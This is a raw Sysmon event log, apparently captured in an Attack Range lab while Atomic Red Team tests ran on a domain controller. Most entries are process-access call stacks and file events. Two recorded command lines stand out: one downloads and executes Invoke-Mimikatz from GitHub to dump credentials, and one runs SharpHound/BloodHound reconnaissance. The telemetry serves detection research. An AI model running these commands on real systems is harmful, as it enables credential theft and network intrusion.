14:07:47.830{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.834{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1059.001\src\"" -ForegroundColor Cyan import-module C:\AtomicRedTeam\atomics\T1059.001\src\SharpHound.ps1 Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.799{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=C1E5F829DBEA02A535B3EE6B294BB6E5,SHA256=483BFE9263739BCF6DB5181B64D34211B46F7121167A40E8B6B73E40CC42E203,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.752{5ABCFE62-E9B3-6040-444E-00000000AD01}6232ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.518{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.518{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.471{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.471{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:07:47.455{5ABCFE62-E9B3-6040-444E-00000000AD01}6232\PSHost.132593404674047142.6232.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.455{5ABCFE62-E9B3-6040-444E-00000000AD01}6232ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_t4jobsbo.hce.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.455{5ABCFE62-E9B3-6040-444E-00000000AD01}6232ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_q5ktl0hf.rrr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.455{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=860365933F42557705C3A1A8CB5478EE,SHA256=7C2CB60F232CCCCBEFA2EC5B71250D363DE5358C9BBE680CF1F867DCF2F688D3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.440{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_q5ktl0hf.rrr.ps12021-03-04 14:07:47.440 10341000x80000000000000002203208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.424{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D64B6F23F6DB9BAC18C1F25BE02A02F2,SHA256=7545F8A17840CC0CE503103F984B5072BCECB97DCCF03F13556C40AA519AEFEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-E9B3-6040-434E-00000000AD01}22004044C:\Windows\system32\cmd.exe{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.404{5ABCFE62-E9B3-6040-444E-00000000AD01}6232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" 10341000x80000000000000002203198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 